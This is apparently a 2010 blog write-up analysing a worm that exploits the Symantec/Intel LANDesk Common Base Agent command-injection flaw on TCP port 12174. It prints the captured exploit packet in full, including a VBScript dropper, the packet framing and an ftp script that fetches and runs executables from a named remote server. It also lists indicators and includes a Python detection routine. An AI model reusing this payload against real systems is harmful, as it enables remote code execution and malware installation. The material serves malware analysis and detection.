Friday, January 15, 2010

Trace Symantec Malware Step By Step

by majidi.nima AT gmail.com

Saturday, January 11, 2010


First Section: Exploit Payload Analysis

Vulnerability description:
“The specific flaw exists in the Intel LANDesk Common Base Agent bundled with the affected products. When a specially crafted packet is sent to TCP port 12174, the contents of the packet are passed directly to a call to CreateProcessA() as the lpCommandLine argument. The resulting command will be executed with SYSTEM privileges. Authentication is not required to exploit this vulnerability.” ZDI-09-060, Apr 28 2009

Since this is not a memory corruption vulnerability, exploitation is straightforward and stable. Symantec Endpoint Protection, Symantec AntiVirus Corporate Edition and Symantec Client Security are affected. Active exploitation of the vulnerability has been observed since mid October and peaked sharply at the end of December.





Closer look at the worm exploit:

I reviewed two public exploits for this vulnerability: a module for the Metasploit Framework (cba_exec.rb) and a proof of concept published under the name “kingscope”. The worm's exploit is basically the same as the kingscope POC, but it has some differences, which you can see in the following table:

Symantec worm exploit architecture:

\x00\x00\x00\x00\xFB\x01 -----> start process cmd.exe /c -----> exit -1059867469 >> \x00\x00

Symantec public exploits architecture:

\x00\x00\x00\x00\x38\x00 -----> start process cmd.exe /c -----> exit -1059867469 >> \x00

Exploit Database ID “EDB-ID: 10340”

Exploit Payload Analysis:
The exploit code uses cmd.exe to create a VBScript file (d.vbs) that downloads malicious files from a remote ftp server. The following dump shows the VBScript creation phase. The exploit packets were captured on TCP port 12174 and carry 514 bytes of data.


00 00 00 00 FB 01 63 6D 64 2E 65 78 65 20 2F 63 ....û.cmd.exe /c
20 63 6D 64 2E 65 78 65 20 2F 63 20 65 63 68 6F cmd.exe /c echo
20 6F 6E 20 65 72 72 6F 72 20 72 65 73 75 6D 65 on error resume
20 6E 65 78 74 20 3E 64 2E 76 62 73 26 65 63 68 next >d.vbs&ech
6F 20 63 6D 64 6C 69 6E 65 3D 57 73 63 72 69 70 o cmdline=Wscrip
74 2E 41 72 67 75 6D 65 6E 74 73 28 30 29 20 3E t.Arguments(0) >
3E 64 2E 76 62 73 26 65 63 68 6F 20 53 65 74 20 >d.vbs&echo Set
57 53 3D 63 72 65 61 74 65 6F 62 6A 65 63 74 28 WS=createobject(
43 68 72 28 31 31 39 29 2B 43 68 72 28 31 31 35 Chr(119)+Chr(115
29 2B 43 68 72 28 39 39 29 2B 43 68 72 28 31 31 )+Chr(99)+Chr(11
34 29 2B 43 68 72 28 31 30 35 29 2B 43 68 72 28 4)+Chr(105)+Chr(
31 31 32 29 2B 43 68 72 28 31 31 36 29 2B 43 68 112)+Chr(116)+Ch
72 28 34 36 29 2B 43 68 72 28 31 31 35 29 2B 43 r(46)+Chr(115)+C
68 72 28 31 30 34 29 2B 43 68 72 28 31 30 31 29 hr(104)+Chr(101)
2B 43 68 72 28 31 30 38 29 2B 43 68 72 28 31 30 +Chr(108)+Chr(10
38 29 29 20 3E 3E 64 2E 76 62 73 26 65 63 68 6F 8)) >>d.vbs&echo
20 77 73 2E 72 75 6E 20 63 6D 64 6C 69 6E 65 2C ws.run cmdline,
30 20 3E 3E 64 2E 76 62 73 26 64 2E 76 62 73 20 0 >>d.vbs&d.vbs
22 63 6D 64 2E 65 78 65 20 2F 63 20 6D 64 20 69 "cmd.exe /c md i
53 71 6C 26 63 64 20 69 53 71 6C 26 64 65 6C 20 Sql&cd iSql&del
2A 2E 2A 20 2F 66 20 2F 71 26 65 63 68 6F 20 6F *.* /f /q&echo o
70 65 6E 20 69 6E 74 6F 2E 69 6D 7A 6F 6E 65 2E pen into.imzone.
69 6E 3E 6A 26 65 63 68 6F 20 4E 65 77 20 3E 3E in>j&echo New >>
6A 26 65 63 68 6F 20 31 32 33 20 3E 3E 6A 26 65 j&echo 123 >>j&e
63 68 6F 20 6D 67 65 74 20 2A 2E 65 78 65 20 3E cho mget *.exe >
3E 6A 26 65 63 68 6F 20 62 79 65 20 3E 3E 6A 26 >j&echo bye >>j&
66 74 70 20 2D 69 20 2D 73 3A 6A 26 64 65 6C 20 ftp -i -s:j&del
6A 26 65 63 68 6F 20 66 6F 72 20 25 25 69 20 69 j&echo for %%i i
6E 20 28 2A 2E 65 78 65 29 20 64 6F 20 73 74 61 n (*.exe) do sta
72 74 20 25 25 69 3E 44 2E 62 61 74 26 44 2E 62 rt %%i>D.bat&D.b
61 74 26 64 65 6C 20 44 2E 62 61 74 22 20 7C 20 at&del D.bat"
65 78 69 74 20 2D 31 30 35 39 38 36 37 34 36 39 exit -1059867469
00 00 ..
The VBScript (vbs) gives the worm a more reliable way to run multiple commands on the vulnerable system. The exploit creates a new folder named iSql and, if the folder already exists, deletes the files in it.


Finally, an ftp script file named “j” is created and used to download binaries from the remote ftp server with the Microsoft ftp utility. This is a common method used by malware and attackers to fetch files from a remote host onto the victim machine.

Details of the j ftp script:

Remote ftp server: into.imzone.in (IP, 204.45.0.218)
FTP User: new
FTP password: 123
Files: A02.EXE
File size 253952 bytes
MD5 hash c13fa993b714491b1ec15a18a6118d8d
SHA1 hash 189566fa2250471014a37d96eaf4931767920eb2
(This was the first binary we saw, but within a week more than 10 files had been added to the root of the ftp server and were being served to zombies.)

drw-rw-rw- 1 user group 0 Jan 11 08:00 .
drw-rw-rw- 1 user group 0 Jan 11 08:00 ..
-rw-rw-rw- 1 user group 253952 Jan 10 03:27 A09.exe
-rw-rw-rw- 1 user group 65536 Jan 7 10:39 E001.exe
-rw-rw-rw- 1 user group 12288 Jan 6 13:32 G001.exe
-rw-rw-rw- 1 user group 36968 Jan 11 2010 H001.exe
-rw-rw-rw- 1 user group 188416 Dec 29 06:17 J001.exe
-rw-rw-rw- 1 user group 134576 Jan 10 22:01 J002.exe
-rw-rw-rw- 1 user group 65536 Jan 6 10:53 M001.exe
-rw-rw-rw- 1 user group 16138 Jan 9 04:16 P001.exe
-rw-rw-rw- 1 user group 69632 Jan 11 2010 Q.exe
-rw-rw-rw- 1 user group 65536 Jan 6 12:30 d001.exe


After all files with an exe extension (*.exe) have been transferred, the ftp script file is removed. At this point a new batch file (D.bat) is created to run every downloaded malicious file on the victim system; the batch file is removed at the end as well.

System administrators can check suspicious systems for infection by searching for the iSql folder or the d.vbs file. IDS signatures can be developed from the infection vector summarized in the following table.
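As an added example (not the author's code), the following Python routine decodes frames captured on TCP port 12174 the way the two architecture rows above lay them out, undoes the Chr() obfuscation the VBScript uses to spell the object name, and reports the indicators this write-up identifies (d.vbs, iSql, the scripted ftp client, D.bat, the exit marker). The header interpretation (four NULs, then a little-endian length covering the command plus one NUL) and the abbreviated sample command are assumptions, labelled in the code.

```python
import re
import struct

# Indicators from the captured payload (matched case-insensitively): dropper script,
# working folder, scripted ftp client, batch runner, exit marker, Chr()-built object name.
INDICATORS = {
    "vbs_dropper": b"d.vbs",
    "work_folder": b"isql",
    "ftp_script": b"ftp -i -s:",
    "batch_runner": b"d.bat",
    "exit_marker": b"exit -1059867469",
    "wscript_shell": b"wscript.shell",
}
CHR_CHAIN = re.compile(rb"Chr\(\d+\)(?:\+Chr\(\d+\))*")

def decode_chr_chains(command):
    """Replace every Chr(n)+Chr(m)+... chain with the bytes it spells."""
    return CHR_CHAIN.sub(
        lambda m: bytes(int(n) for n in re.findall(rb"\d+", m.group(0))), command)

def parse_cba_packet(data):
    """Split a TCP/12174 payload into header fields and the command line.
    Assumed layout (not stated on the page, but consistent with its 514-byte
    capture): 4 NULs, LE 16-bit length = command + one NUL, command, 1-2 NULs."""
    if len(data) < 6 or data[:4] != b"\x00\x00\x00\x00":
        return None
    declared_len = struct.unpack("<H", data[4:6])[0]
    command = data[6:].rstrip(b"\x00")
    return {
        "declared_len": declared_len,
        "command": command,
        "trailing_nuls": len(data) - 6 - len(command),  # worm: 2, public PoCs: 1
        "length_consistent": declared_len == len(command) + 1,
    }

def inspect_packet(data):
    """Return the indicator names present in the packet's deobfuscated command."""
    parsed = parse_cba_packet(data)
    if parsed is None:
        return []
    cmd = decode_chr_chains(parsed["command"]).lower()
    hits = ["cmd_exec"] if cmd.startswith(b"cmd.exe /c") else []
    return hits + [name for name, needle in INDICATORS.items() if needle in cmd]

# Constructed, abbreviated command carrying the captured payload's indicators,
# framed the way the worm frames it (two trailing NULs); not a real capture.
SAMPLE_CMD = (b"cmd.exe /c echo Set WS=createobject(Chr(119)+Chr(115)+Chr(99)+Chr(114)"
              b"+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)"
              b'+Chr(108)) >>d.vbs&d.vbs "cmd.exe /c md iSql&ftp -i -s:j&D.bat" | exit -1059867469')
SAMPLE_WORM = b"\x00\x00\x00\x00" + struct.pack("<H", len(SAMPLE_CMD) + 1) + SAMPLE_CMD + b"\x00\x00"
```

The trailing NUL count distinguishes the worm's framing from the public proof-of-concept framing shown in the architecture rows.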
